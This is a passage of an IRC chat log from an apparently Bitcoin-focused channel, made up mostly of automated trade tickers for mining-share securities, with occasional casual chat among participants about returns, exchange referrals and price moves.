[DMS.MINING] 1 @ 0.00352 BTC [+] Aug 26 18:45:53 [BTCTC] [DMS.MINING] 41 @ 0.00363 = 0.1488 BTC [+] Aug 26 18:47:35 [BTCTC] [LABCOIN] 10 @ 0.00341 = 0.0341 BTC [+] Aug 26 18:47:39 [BTCTC] [LABCOIN] 10 @ 0.0034 = 0.034 BTC [-] Aug 26 18:47:40 [BTCTC] [LABCOIN] 440 @ 0.003391 = 1.492 BTC [-] Aug 26 18:47:41 [BTCTC] [LABCOIN] 40 @ 0.00339 = 0.1356 BTC [-] Aug 26 18:47:49 [BTCTC] [TAT.ASICMINER] 50 @ 0.02994 = 1.497 BTC [-] Aug 26 18:49:21 [BTCTC] [DMS.PURCHASE] 500 @ 0.01606 = 8.03 BTC [+] Aug 26 18:50:19 [BTCTC] [DMS.MINING] 147 @ 0.00363 = 0.5336 BTC [+] Aug 26 18:50:20 [BTCTC] [DMS.MINING] 100 @ 0.00363 = 0.363 BTC [+] Aug 26 18:52:24 [BTCTC] [DMS.PURCHASE] 1000 @ 0.01606 = 16.06 BTC [+] Aug 26 18:52:38 [BTCTC] [ASICMINER-PT] 1 @ 3.099 BTC [-] Aug 26 18:52:47 [BTCTC] [ASICMINER-PT] 2 @ 3.1 = 6.2 BTC [+] Aug 26 18:52:48 [BTCTC] [DMS.PURCHASE] 500 @ 0.01606 = 8.03 BTC [+] Aug 26 18:52:49 [BTCTC] [ASICMINER-PT] 1 @ 3.1 BTC [+] Aug 26 18:53:25 [BTCTC] [BASIC-MINING] 12 @ 0.215 = 2.58 BTC [-] Aug 26 18:53:26 [BTCTC] [BASIC-MINING] 1 @ 0.215 BTC [-] Aug 26 18:53:35 [BTCTC] [ASICMINER-PT] 1 @ 3.108 BTC [+] Aug 26 18:54:40 [BTCTC] [LABCOIN] 5 @ 0.00339 = 0.017 BTC [-] Aug 26 18:55:53 [BTCTC] [LABCOIN] 6 @ 0.00349 = 0.0209 BTC [+] Aug 26 18:55:55 [BTCTC] [LABCOIN] 6 @ 0.003491 = 0.0209 BTC [+] Aug 26 18:55:56 [BTCTC] [LABCOIN] 8 @ 0.003494 = 0.028 BTC [+] Aug 26 18:56:26 [BTCTC] [ASICMINER-PT] 1 @ 3.107 BTC [-] Aug 26 18:56:27 [BTCTC] [ASICMINER-PT] 1 @ 3.11 BTC [+] Aug 26 18:56:29 [BTCTC] [ASICMINER-PT] 1 @ 3.12 BTC [+] Aug 26 18:56:30 [BTCTC] [ASICMINER-PT] 1 @ 3.13 BTC [+] Aug 26 18:58:04 [BTCTC] [ASICMINER-PT] 1 @ 3.138 BTC [+] Aug 26 18:58:05 [BTCTC] [ASICMINER-PT] 10 @ 3.15 = 31.5 BTC [+] Aug 26 18:58:06 [BTCTC] [ASICMINER-PT] 4 @ 3.197 = 12.788 BTC [+] Aug 26 18:58:16 [BTCTC] [LABCOIN] 6 @ 0.003401 = 0.0204 BTC [-] Aug 26 18:58:18 [BTCTC] [LABCOIN] 10 @ 0.0034 = 0.034 BTC [-] Aug 26 18:58:19 [BTCTC] [LABCOIN] 1034 @ 0.00339 = 3.5053 BTC [-] Aug 26 18:59:34 [BTCTC] [TAT.ASICMINER] 5 @ 0.02995 = 0.1498 BTC [+] Aug 26 18:59:43 [BTCTC] [LABCOIN] 12 @ 0.003391 = 0.0407 BTC [+] Aug 26 18:59:45 [BTCTC] [LABCOIN] 16 @ 0.00339 = 0.0542 BTC [-] Aug 26 18:59:49 [BTCTC] [ASICMINER-PT] 1 @ 3.137 BTC [-] Aug 26 19:02:39 [BTCTC] [TAT.ASICMINER] 3 @ 0.02995 = 0.0899 BTC [+] Aug 26 19:03:26 [BTCTC] [ASICMINER-PT] 1 @ 3.104 BTC [-] Aug 26 19:03:42 [BTCTC] [TAT.ASICMINER] 46 @ 0.02995 = 1.3777 BTC [+] Aug 26 19:03:42 [BTCTC] [LABCOIN] 20 @ 0.00339 = 0.0678 BTC [-] Aug 26 19:03:43 [BTCTC] [TAT.ASICMINER] 54 @ 0.03 = 1.62 BTC [+] Aug 26 19:05:10 [BTCTC] [ASICMINER-PT] 1 @ 3.193 BTC [+] Aug 26 19:05:35 [BTCTC] [ASICMINER-PT] 1 @ 3.192 BTC [-] Aug 26 19:05:36 [BTCTC] [ASICMINER-PT] 3 @ 3.193 = 9.579 BTC [+] Aug 26 19:05:38 [BTCTC] [TAT.ASICMINER] 2 @ 0.03 = 0.06 BTC [+] Aug 26 19:07:08 [BTCTC] [DMS.MINING] 20 @ 0.003673 = 0.0735 BTC [+] Aug 26 19:07:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.03 BTC [+] Aug 26 19:07:40 [BTCTC] [LABCOIN] 250 @ 0.00339 = 0.8475 BTC [-] Aug 26 19:08:55 [BTCTC] [HOSTED-MINING] 30 @ 0.00279 = 0.0837 BTC [-] Aug 26 19:09:16 [BTCTC] [LABCOIN] 1 @ 0.00339 BTC [-] Aug 26 19:09:31 [BTCTC] [TAT.ASICMINER] 82 @ 0.03 = 2.46 BTC [+] Aug 26 19:10:01 [BTCTC] [LABCOIN] 2 @ 0.00339 = 0.0068 BTC [-] Aug 26 19:10:18 [HAVELOCK] [LABCO] 1 @ 0.00305 BTC [+] Aug 26 19:10:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.03 BTC [+] Aug 26 19:10:41 [BTCTC] [ASICMINER-PT] 1 @ 3.101 BTC [-] Aug 26 19:11:28 [BTCTC] [TAT.ASICMINER] 102 @ 0.03 = 3.06 BTC [+] Aug 26 19:13:00 [BTCTC] [DMS.MINING] 280 @ 0.003674 = 1.0287 BTC [+] Aug 26 19:13:36 no one is here Aug 26 19:13:45 thats really bad Aug 26 19:17:04 [BTCTC] [LABCOIN] 2291 @ 0.00339 = 7.7665 BTC [-] Aug 26 19:17:06 [BTCTC] [LABCOIN] 1 @ 0.00339 BTC [-] Aug 26 19:17:07 [BTCTC] [LABCOIN] 165 @ 0.003387 = 0.5589 BTC [-] Aug 26 19:17:08 [BTCTC] [LABCOIN] 3 @ 0.003383 = 0.0101 BTC [-] Aug 26 19:17:38 [BTCTC] [TAT.ASICMINER] 204 @ 0.03 = 6.12 BTC [+] Aug 26 19:17:38 [BTCTC] [TAT.ASICMINER] 86 @ 0.03 = 2.58 BTC [+] Aug 26 19:17:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.03 = 0.06 BTC [+] Aug 26 19:18:38 me and assbot got a room Aug 26 19:20:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.03049 BTC [+] Aug 26 19:20:14 [BTCTC] [LABCOIN] 197 @ 0.003383 = 0.6665 BTC [-] Aug 26 19:20:16 [BTCTC] [LABCOIN] 3 @ 0.003381 = 0.0101 BTC [-] Aug 26 19:21:27 [BTCTC] [DMS.PURCHASE] 10 @ 0.01605 = 0.1605 BTC [-] Aug 26 19:21:36 [BTCTC] [BTC-BOND] 206 @ 0.01 = 2.06 BTC [+] Aug 26 19:22:29 [BTCTC] [HOSTED-MINING] 3 @ 0.00279 = 0.0084 BTC [-] Aug 26 19:22:34 [HAVELOCK] [LABCO] 27 @ 0.00305 = 0.0824 BTC [+] Aug 26 19:22:50 [BTCTC] [LABCOIN] 9 @ 0.003381 = 0.0304 BTC [-] Aug 26 19:24:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.03049 BTC [+] Aug 26 19:25:08 [BTCTC] [BASIC-MINING] 1 @ 0.2127 BTC [-] Aug 26 19:26:19 [BTCTC] [DMS.MINING] 5 @ 0.00367 = 0.0184 BTC [-] Aug 26 19:26:52 [BTCTC] [LABCOIN] 10 @ 0.003381 = 0.0338 BTC [-] Aug 26 19:30:46 [BTCTC] [LABCOIN] 11 @ 0.003381 = 0.0372 BTC [-] Aug 26 19:30:58 [BTCTC] [LABCOIN] 1 @ 0.003459 BTC [+] Aug 26 19:31:00 [BTCTC] [LABCOIN] 1 @ 0.00346 BTC [+] Aug 26 19:31:57 [BTCTC] [LABCOIN] 2 @ 0.00346 = 0.0069 BTC [+] Aug 26 19:32:46 [BTCTC] [DMS.MINING] 495 @ 0.00367 = 1.8167 BTC [-] Aug 26 19:36:22 .d Aug 26 19:36:24 65750060.14908 | Next Diff in 1685 blocks | Estimated Change: 8.7891% in 10d 16h 6m 47s Aug 26 19:36:36 ;;nethash Aug 26 19:36:37 521989.121813 Aug 26 19:37:01 [MPEX] [S.MPOE] 1819 @ 0.000864 = 1.5716 BTC [-] Aug 26 19:37:18 lol mpoe Aug 26 19:37:46 [BTCTC] [DMS.MINING] 10 @ 0.003674 = 0.0367 BTC [+] Aug 26 19:38:03 [BTCTC] [ASICMINER-PT] 1 @ 3.101 BTC [-] Aug 26 19:38:04 [BTCTC] [ASICMINER-PT] 1 @ 3.1 BTC [-] Aug 26 19:39:23 [BTCTC] [ASICMINER-PT] 1 @ 3.038 BTC [-] Aug 26 19:39:45 [BTCTC] [MININGCO.ETF] 1 @ 0.12 BTC [+] Aug 26 19:40:17 what now? Aug 26 19:40:17 [BTCTC] [TAT.VIRTUALMINE] 14 @ 0.001129 = 0.0158 BTC [+] Aug 26 19:40:22 thestringpuller: what now? Aug 26 19:40:39 [BTCTC] [TAT.ASICMINER] 2 @ 0.03049 = 0.061 BTC [+] Aug 26 19:40:57 ?? Aug 26 19:41:01 elaborate plz Aug 26 19:41:11 what about mpoe is so amusing this morning? Aug 26 19:41:17 [BTCTC] [ASICMINER-PT] 1 @ 3.04 BTC [+] Aug 26 19:41:37 [MPEX] [S.MPOE] 3450 @ 0.00086368 = 2.9797 BTC [-] Aug 26 19:41:40 [BTCTC] [ASICMINER-PT] 3 @ 3.038 = 9.114 BTC [-] Aug 26 19:41:46 [HAVELOCK] [XBOND] 1 @ 0.00113 BTC [-] Aug 26 19:42:11 [BTCTC] [HOSTED-MINING] 37 @ 0.00279 = 0.1032 BTC [-] Aug 26 19:42:49 [BTCTC] [BASIC-MINING] 1 @ 0.2148 BTC [+] Aug 26 19:43:05 it holds at about 12% per month sans volatility Aug 26 19:43:30 jurov once said mpoe equity will more than pay the brokerage fees for coinbr Aug 26 19:43:34 its been confirmed Aug 26 19:44:22 [BTCTC] [TAT.ASICMINER] 4 @ 0.0305 = 0.122 BTC [+] Aug 26 19:44:23 [BTCTC] [TAT.ASICMINER] 5 @ 0.03088 = 0.1544 BTC [+] Aug 26 19:44:24 [BTCTC] [LABCOIN] 1 @ 0.003382 BTC [-] Aug 26 19:44:25 [BTCTC] [TAT.ASICMINER] 5 @ 0.03088 = 0.1544 BTC [+] Aug 26 19:44:26 [BTCTC] [LABCOIN] 299 @ 0.003381 = 1.0109 BTC [-] Aug 26 19:45:14 hmmm Aug 26 19:45:15 [BTCTC] [ASICMINER-PT] 1 @ 3.166 BTC [+] Aug 26 19:45:18 30 btc to trade though Aug 26 19:45:29 That's alot of coin Aug 26 19:45:30 not on coinbr Aug 26 19:45:39 [BTCTC] [LABCOIN] 15 @ 0.003381 = 0.0507 BTC [-] Aug 26 19:45:42 coinbr is 9 bitcents a month Aug 26 19:45:49 [BTCTC] [DMS.SELLING] 4 @ 0.0124 = 0.0496 BTC [-] Aug 26 19:45:55 so yea Aug 26 19:45:58 hmmmmm Aug 26 19:46:00 hmmmm Aug 26 19:46:02 mmmmm Aug 26 19:46:03 I see Aug 26 19:46:07 thestringpuller - I've been told that shares in Nasdaq and NYSE have been very good performers over the last few years. I haven't checked myself. Aug 26 19:46:30 i dont consumer trade anymore except for my ira Aug 26 19:46:36 thats in S&P Aug 26 19:46:57 [BTCTC] [HOSTED-MINING] 100 @ 0.00279 = 0.279 BTC [-] Aug 26 19:47:00 [BTCTC] [ASICMINER-PT] 1 @ 3.038 BTC [-] Aug 26 19:47:01 [BTCTC] [DMS.SELLING] 14 @ 0.01224 = 0.1714 BTC [-] Aug 26 19:47:58 [BTCTC] [BASIC-MINING] 1 @ 0.2148 BTC [+] Aug 26 19:48:34 Do I need an invite code or is that just for referrals? Aug 26 19:49:52 jist for referrals Aug 26 19:50:08 which is for Aug 26 19:50:23 getting a percent of trade fees Aug 26 19:50:34 [HAVELOCK] [AM100] 2 @ 0.02874999 = 0.0575 BTC [-] Aug 26 19:50:36 well do you have an account? Aug 26 19:51:04 I have one if you're just looking for the referral thing. Aug 26 19:51:19 i dont use my account Aug 26 19:51:29 i exited my mpoe shares for now Aug 26 19:51:38 back at .0006 Aug 26 19:51:43 [BTCTC] [LABCOIN] 8 @ 0.003381 = 0.027 BTC [-] Aug 26 19:52:35 Well I would rather someone to be able to profit off my misdoings Aug 26 19:52:44 lol Aug 26 19:52:57 i owe jurov money so maybe lolol Aug 26 19:53:05 o my Aug 26 19:53:46 orly? lol Aug 26 19:53:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.031 BTC [+] Aug 26 19:54:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.031 BTC [+] Aug 26 19:55:04 yea Aug 26 19:55:21 you suspended my accoubt and I owe like 0.07 or something Aug 26 19:55:26 one can have small negative balance due to unpaid fees, i generally don't mind it Aug 26 19:55:32 ya Aug 26 19:55:43 ill get to it when i get more cashflow Aug 26 19:55:50 [BTCTC] [KENILWORTH] 26 @ 0.0018 = 0.0468 BTC [+] Aug 26 19:57:31 [BTCTC] [DMS.SELLING] 1 @ 0.01273 BTC [+] Aug 26 19:58:49 [BTCTC] [TAT.ASICMINER] 5 @ 0.03088 = 0.1544 BTC [-] Aug 26 20:00:30 [BTCTC] [DMS.MINING] 1 @ 0.003674 BTC [+] Aug 26 20:01:43 [BTCTC] [COGNITIVE] 2 @ 0.3272 = 0.6544 BTC [+] Aug 26 20:02:17 [BTCTC] [BTC-GROWTH] 28 @ 0.1005 = 2.814 BTC [+] Aug 26 20:03:00 [MPEX] [S.MPOE] 1128 @ 0.00086368 = 0.9742 BTC [-] Aug 26 20:03:02 [MPEX] [S.MPOE] 922 @ 0.00086428 = 0.7969 BTC [+] Aug 26 20:04:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.03088 BTC [-] Aug 26 20:04:38 [BTCTC] [TAT.ASICMINER] 4 @ 0.03049 = 0.122 BTC [-] Aug 26 20:05:10 [BTCTC] [LABCOIN] 300 @ 0.003381 = 1.0143 BTC [-] Aug 26 20:05:42 [BTCTC] [ASICMINER-PT] 1 @ 3.099 BTC [+] Aug 26 20:06:23 [BTCTC] [ASICMINER-PT] 1 @ 3.099 BTC [+] Aug 26 20:06:26 [BTCTC] [ASICMINER-PT] 1 @ 3.1 BTC [+] Aug 26 20:06:59 https://bitcointalk.org/index.php?topic=281256.0 Aug 26 20:07:04 Feeler for investment to bid on coolio music collection Aug 26 20:07:10 [BTCTC] [ASICMINER-PT] 1 @ 3.038 BTC [-] Aug 26 20:07:41 [BTCTC] [ASICMINER-PT] 1 @ 3.037 BTC [-] Aug 26 20:07:59 [BTCTC] [LABCOIN] 5 @ 0.003438 = 0.0172 BTC [+] Aug 26 20:08:12 [BTCTC] [ASICMINER-PT] 1 @ 3.012 BTC [-] Aug 26 20:08:20 [BTCTC] [TAT.ASICMINER] 7 @ 0.031 = 0.217 BTC [+] Aug 26 20:08:38 [BTCTC] [ASICMINER-PT] 1 @ 3.011 BTC [-] Aug 26 20:08:50 [BTCTC] [TAT.ASICMINER] 35 @ 0.03051 = 1.0679 BTC [-] Aug 26 20:09:10 [BTCTC] [ASICMINER-PT] 1 @ 3.008 BTC [-] Aug 26 20:09:23 [BTCTC] [TAT.ASICMINER] 10 @ 0.03051 = 0.3051 BTC [-] Aug 26 20:09:32 [BTCTC] [DMS.MINING] 1 @ 0.00367 BTC [-] Aug 26 20:09:46 [BTCTC] [ASICMINER-PT] 1 @ 3.007 BTC [-] Aug 26 20:09:58 [BTCTC] [LABCOIN] 5 @ 0.003438 = 0.0172 BTC [+] Aug 26 20:10:17 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001129 BTC [+] Aug 26 20:10:33 [HAVELOCK] [HIM] 1 @ 0.1960001 BTC [+] Aug 26 20:10:35 [HAVELOCK] [HIM] 7 @ 0.196 = 1.372 BTC [-] Aug 26 20:10:37 [HAVELOCK] [HIM] 3 @ 0.19400001 = 0.582 BTC [-] Aug 26 20:10:39 [HAVELOCK] [HIM] 9 @ 0.19300001 = 1.737 BTC [-] Aug 26 20:11:50 [BTCTC] [TAT.ASICMINER] 5 @ 0.03051 = 0.1526 BTC [-] Aug 26 20:11:51 [BTCTC] [TAT.ASICMINER] 50 @ 0.0305 = 1.525 BTC [-] Aug 26 20:11:53 [BTCTC] [TAT.ASICMINER] 5 @ 0.03049 = 0.1525 BTC [-] Aug 26 20:12:21 [BTCTC] [TAT.ASICMINER] 20 @ 0.0305 = 0.61 BTC [+] Aug 26 20:13:32 [BTCTC] [TAT.ASICMINER] 10 @ 0.03051 = 0.3051 BTC [+] Aug 26 20:13:56 [BTCTC] [LABCOIN] 20 @ 0.003438 = 0.0688 BTC [+] Aug 26 20:13:57 [BTCTC] [LABCOIN] 20 @ 0.003381 = 0.0676 BTC [-] Aug 26 20:13:58 [BTCTC] [ASICMINER-PT] 1 @ 2.999 BTC [-] Aug 26 20:14:00 [BTCTC] [ASICMINER-PT] 1 @ 2.983 BTC [-] Aug 26 20:14:00 [BTCTC] [ASICMINER-PT] 1 @ 2.972 BTC [-] Aug 26 20:14:09 [BTCTC] [ASICMINER-PT] 5 @ 2.971 = 14.855 BTC [-] Aug 26 20:14:11 [BTCTC] [ASICMINER-PT] 1 @ 2.96 BTC [-] Aug 26 20:14:12 [BTCTC] [ASICMINER-PT] 1 @ 2.956 BTC [-] Aug 26 20:14:13 [BTCTC] [ASICMINER-PT] 1 @ 2.935 BTC [-] Aug 26 20:14:14 [BTCTC] [ASICMINER-PT] 4 @ 2.933 = 11.732 BTC [-] Aug 26 20:14:16 [BTCTC] [ASICMINER-PT] 5 @ 2.932 = 14.66 BTC [-] Aug 26 20:14:17 [BTCTC] [ASICMINER-PT] 7 @ 2.93 = 20.51 BTC [-] Aug 26 20:14:18 [BTCTC] [ASICMINER-PT] 3 @ 2.924 = 8.772 BTC [-] Aug 26 20:14:19 [BTCTC] [ASICMINER-PT] 10 @ 2.923 = 29.23 BTC [-] Aug 26 20:14:19 [BTCTC] [ASICMINER-PT] 1 @ 2.905 BTC [-] Aug 26 20:14:20 [BTCTC] [ASICMINER-PT] 10 @ 2.904 = 29.04 BTC [-] Aug 26 20:14:22 [BTCTC] [ASICMINER-PT] 5 @ 2.903 = 14.515 BTC [-] Aug 26 20:14:23 [BTCTC] [ASICMINER-PT] 7 @ 2.903 = 20.321 BTC [-] Aug 26 20:15:06 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [-] Aug 26 20:15:31 [BTCTC] [TAT.ASICMINER] 27 @ 0.03051 = 0.8238 BTC [+] Aug 26 20:15:32 [BTCTC] [TAT.ASICMINER] 50 @ 0.0305 = 1.525 BTC [-] Aug 26 20:15:34 [BTCTC] [TAT.ASICMINER] 23 @ 0.03049 = 0.7013 BTC [-] Aug 26 20:16:24 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [-] Aug 26 20:16:42 [BTCTC] [TAT.ASICMINER] 34 @ 0.0305 = 1.037 BTC [+] Aug 26 20:16:44 [BTCTC] [TAT.ASICMINER] 34 @ 0.03049 = 1.0367 BTC [-] Aug 26 20:16:44 [BTCTC] [TAT.ASICMINER] 10 @ 0.03 = 0.3 BTC [-] Aug 26 20:16:45 [BTCTC] [TAT.ASICMINER] 22 @ 0.02962 = 0.6516 BTC [-] Aug 26 20:17:48 [BTCTC] [TAT.ASICMINER] 14 @ 0.02963 = 0.4148 BTC [+] Aug 26 20:17:49 [BTCTC] [TAT.ASICMINER] 14 @ 0.02962 = 0.4147 BTC [-] Aug 26 20:17:51 [BTCTC] [TAT.ASICMINER] 72 @ 0.02961 = 2.1319 BTC [-] Aug 26 20:19:14 [BTCTC] [TAT.ASICMINER] 21 @ 0.02962 = 0.622 BTC [+] Aug 26 20:20:21 [BTCTC] [TAT.ASICMINER] 20 @ 0.02961 = 0.5922 BTC [-] Aug 26 20:20:31 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [-] Aug 26 20:20:32 [BTCTC] [ASICMINER-PT] 1 @ 2.878 BTC [-] Aug 26 20:20:34 [BTCTC] [ASICMINER-PT] 1 @ 2.877 BTC [-] Aug 26 20:20:35 [BTCTC] [ASICMINER-PT] 1 @ 2.877 BTC [-] Aug 26 20:20:35 [BTCTC] [ASICMINER-PT] 1 @ 2.877 BTC [-] Aug 26 20:20:36 [BTCTC] [ASICMINER-PT] 1 @ 2.872 BTC [-] Aug 26 20:20:37 [BTCTC] [ASICMINER-PT] 6 @ 2.87 = 17.22 BTC [-] Aug 26 20:20:38 [BTCTC] [ASICMINER-PT] 1 @ 2.87 BTC [-] Aug 26 20:20:40 [BTCTC] [ASICMINER-PT] 1 @ 2.861 BTC [-] Aug 26 20:20:41 [BTCTC] [ASICMINER-PT] 1 @ 2.85 BTC [-] Aug 26 20:20:42 [BTCTC] [ASICMINER-PT] 9 @ 2.82 = 25.38 BTC [-] Aug 26 20:20:43 [BTCTC] [ASICMINER-PT] 1 @ 2.816 BTC [-] Aug 26 20:20:44 [BTCTC] [ASICMINER-PT] 6 @ 2.8 = 16.8 BTC [-] Aug 26 20:20:45 [BTCTC] [ASICMINER-PT] 1 @ 2.783 BTC [-] Aug 26 20:20:45 [BTCTC] [ASICMINER-PT] 3 @ 2.781 = 8.343 BTC [-] Aug 26 20:20:46 [BTCTC] [ASICMINER-PT] 1 @ 2.78 BTC [-] Aug 26 20:20:47 [BTCTC] [ASICMINER-PT] 20 @ 2.773 = 55.46 BTC [-] Aug 26 20:23:06 So you can go down to 2.25 again, and I'll be happy! Aug 26 20:23:08 [BTCTC] [ASICMINER-PT] 1 @ 2.998 BTC [+] Aug 26 20:23:47 [BTCTC] [ASICMINER-PT] 1 @ 2 BTC [-] Aug 26 20:23:57 o Aug 26 20:24:01 o.O Aug 26 20:24:08 [BTCTC] [ASICMINER-PT] 1 @ 2.4 BTC [+] Aug 26 20:24:25 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [+] Aug 26 20:24:26 [BTCTC] [TAT.ASICMINER] 10 @ 0.02961 = 0.2961 BTC [-] Aug 26 20:25:36 [BTCTC] [DMS.MINING] 1 @ 0.00367 BTC [-] Aug 26 20:25:49 [HAVELOCK] [AM1] 1 @ 3.03 BTC [+] Aug 26 20:25:51 [HAVELOCK] [AM1] 4 @ 3.09 = 12.36 BTC [+] Aug 26 20:26:15 [HAVELOCK] [AM1] 1 @ 3.09 BTC [+] Aug 26 20:27:22 Rulother: lol Aug 26 20:27:26 . Aug 26 20:27:49 [BTCTC] [LABCOIN] 1 @ 0.003381 BTC [-] Aug 26 20:28:33 [BTCTC] [TAT.ASICMINER] 8 @ 0.02961 = 0.2369 BTC [-] Aug 26 20:28:34 [BTCTC] [ASICMINER-PT] 1 @ 2.78 BTC [+] Aug 26 20:28:37 Maybe I should try this with other stocks Aug 26 20:28:45 [BTCTC] [TAT.ASICMINER] 9 @ 0.02961 = 0.2665 BTC [-] Aug 26 20:29:13 [BTCTC] [TAT.ASICMINER] 61 @ 0.02961 = 1.8062 BTC [-] Aug 26 20:29:13 If labcoin would hit .0044 again I would be so happy Aug 26 20:29:14 [BTCTC] [TAT.ASICMINER] 36 @ 0.02961 = 1.066 BTC [-] Aug 26 20:29:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.0294 BTC [-] Aug 26 20:29:16 [BTCTC] [TAT.ASICMINER] 155 @ 0.0293 = 4.5415 BTC [-] Aug 26 20:29:18 [BTCTC] [ASICMINER-PT] 1 @ 2.767 BTC [-] Aug 26 20:29:19 [BTCTC] [ASICMINER-PT] 1 @ 2.766 BTC [-] Aug 26 20:29:52 [BTCTC] [TAT.ASICMINER] 2 @ 0.02901 = 0.058 BTC [-] Aug 26 20:29:54 [BTCTC] [TAT.ASICMINER] 2 @ 0.029 = 0.058 BTC [-] Aug 26 20:29:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.02851 BTC [-] Aug 26 20:29:56 [BTCTC] [TAT.ASICMINER] 48 @ 0.0285 = 1.368 BTC [-] Aug 26 20:30:13 I guess this genie only allows 1 wish Aug 26 20:30:25 [BTCTC] [TAT.ASICMINER] 67 @ 0.02851 = 1.9102 BTC [+] Aug 26 20:30:27 [BTCTC] [TAT.ASICMINER] 27 @ 0.0285 = 0.7695 BTC [-] Aug 26 20:31:23 [BTCTC] [DMS.SELLING] 665 @ 0.0123 = 8.1795 BTC [-] Aug 26 20:32:09 [BTCTC] [DMS.SELLING] 469 @ 0.01225 = 5.7453 BTC [-] Aug 26 20:39:29 [HAVELOCK] [AM100] 1 @ 0.02874 BTC [-] Aug 26 20:43:32 [BTCTC] [DMS.MINING] 28 @ 0.00367 = 0.1028 BTC [-] Aug 26 20:45:27 [BTCTC] [DMS.MINING] 136 @ 0.00367 = 0.4991 BTC [-] Aug 26 20:50:42 [BTCTC] [DMS.MINING] 12 @ 0.003674 = 0.0441 BTC [+] Aug 26 20:52:05 [BTCTC] [TAT.ASICMINER] 5 @ 0.02851 = 0.1426 BTC [+] Aug 26 20:55:24 [BTCTC] [DMS.SELLING] 286 @ 0.01224 = 3.5006 BTC [-] Aug 26 20:55:25 [BTCTC] [DMS.SELLING] 60 @ 0.01223 = 0.7338 BTC [-] Aug 26 20:55:27 [BTCTC] [DMS.SELLING] 53 @ 0.01222 = 0.6477 BTC [-] Aug 26 20:58:27 [BTCTC] [HOSTED-MINING] 350 @ 0.00279 = 0.9765 BTC [-] Aug 26 20:59:46 [BTCTC] [ASICMINER-PT] 1 @ 2.872 BTC [+] Aug 26 20:59:47 [BTCTC] [ASICMINER-PT] 2 @ 2.873 = 5.746 BTC [+] Aug 26 20:59:49 [BTCTC] [ASICMINER-PT] 1 @ 2.877 BTC [+] Aug 26 20:59:50 [BTCTC] [ASICMINER-PT] 1 @ 2.95 BTC [+] Aug 26 21:00:01 [BTCTC] [DMS.MINING] 1 @ 0.003673 BTC [-] Aug 26 21:00:02 [BTCTC] [DMS.MINING] 5 @ 0.003674 = 0.0184 BTC [+] Aug 26 21:00:36 [BTCTC] [DMS.PURCHASE] 4 @ 0.01605 = 0.0642 BTC [-] Aug 26 21:01:43 [BTCTC] [TAT.ASICMINER] 15 @ 0.02852 = 0.4278 BTC [+] Aug 26 21:01:44 [BTCTC] [TAT.ASICMINER] 35 @ 0.02851 = 0.9979 BTC [-] Aug 26 21:07:40 kakobrekla: oh my. divide by 0 Aug 26 21:08:15 [HAVELOCK] [XBOND] 1 @ 0.001176 BTC [+] Aug 26 21:09:13 [MPEX] [S.MPOE] 2848 @ 0.00086136 = 2.4532 BTC [-] Aug 26 21:09:14 [MPEX] [S.MPOE] 952 @ 0.00086118 = 0.8198 BTC [-] Aug 26 21:14:35 [BTCTC] [TAT.ASICMINER] 15 @ 0.02853 = 0.428 BTC [+] Aug 26 21:14:59 [BTCTC] [TAT.ASICMINER] 10 @ 0.02852 = 0.2852 BTC [-] Aug 26 21:16:07 [BTCTC] [LTC-ATF.B2] 50 @ 0.01042 = 0.521 BTC [-] Aug 26 21:16:10 [BTCTC] [TAT.ASICMINER] 5 @ 0.02853 = 0.1427 BTC [+] Aug 26 21:22:57 [BTCTC] [ASICMINER-PT] 1 @ 2.921 BTC [-] Aug 26 21:24:05 [BTCTC] [ACTIVEMINING] 3 @ 0.005191 = 0.0156 BTC [-] Aug 26 21:25:13 [BTCTC] [ASICMINER-PT] 1 @ 2.839 BTC [-] Aug 26 21:25:55 [BTCTC] [BASIC-MINING] 12 @ 0.2148 = 2.5776 BTC [+] Aug 26 21:25:55 [BTCTC] [BASIC-MINING] 9 @ 0.2149 = 1.9341 BTC [+] Aug 26 21:25:56 [BTCTC] [BASIC-MINING] 37 @ 0.215 = 7.955 BTC [+] Aug 26 21:25:58 [BTCTC] [BASIC-MINING] 2 @ 0.25 = 0.5 BTC [+] Aug 26 21:26:18 [BTCTC] [ASICMINER-PT] 1 @ 2.941 BTC [+] Aug 26 21:27:22 [BTCTC] [ASICMINER-PT] 1 @ 2.839 BTC [-] Aug 26 21:27:34 [HAVELOCK] [AM100] 1 @ 0.02874 BTC [-] Aug 26 21:27:38 [BTCTC] [ASICMINER-PT] 1 @ 2.84 BTC [+] Aug 26 21:28:51 [BTCTC] [ASICMINER-PT] 1 @ 2.849 BTC [+] Aug 26 21:29:18 [BTCTC] [ASICMINER-PT] 1 @ 2.91 BTC [+] Aug 26 21:29:30 [BTCTC] [ASICMINER-PT] 1 @ 2.798 BTC [-] Aug 26 21:29:31 [BTCTC] [ASICMINER-PT] 1 @ 2.796 BTC [-] Aug 26 21:29:32 [BTCTC] [ASICMINER-PT] 5 @ 2.795 = 13.975 BTC [-] Aug 26 21:29:33 [BTCTC] [ASICMINER-PT] 1 @ 2.78 BTC [-] Aug 26 21:30:28 [BTCTC] [ASICMINER-PT] 1 @ 2.809 BTC [+] Aug 26 21:31:45 [BTCTC] [ASICMINER-PT] 1 @ 2.91 BTC [+] Aug 26 21:32:00 [BTCTC] [ASICMINER-PT] 1 @ 2.773 BTC [-] Aug 26 21:32:02 [BTCTC] [ASICMINER-PT] 2 @ 2.772 = 5.544 BTC [-] Aug 26 21:32:29 [BTCTC] [LABCOIN] 5000 @ 0.003402 = 17.01 BTC [+] Aug 26 21:32:30 [BTCTC] [LABCOIN] 1900 @ 0.003401 = 6.4619 BTC [-] Aug 26 21:32:32 [BTCTC] [LABCOIN] 3000 @ 0.003383 = 10.149 BTC [-] Aug 26 21:32:33 [BTCTC] [LABCOIN] 500 @ 0.003382 = 1.691 BTC [-] Aug 26 21:32:34 [BTCTC] [LABCOIN] 324 @ 0.003381 = 1.0954 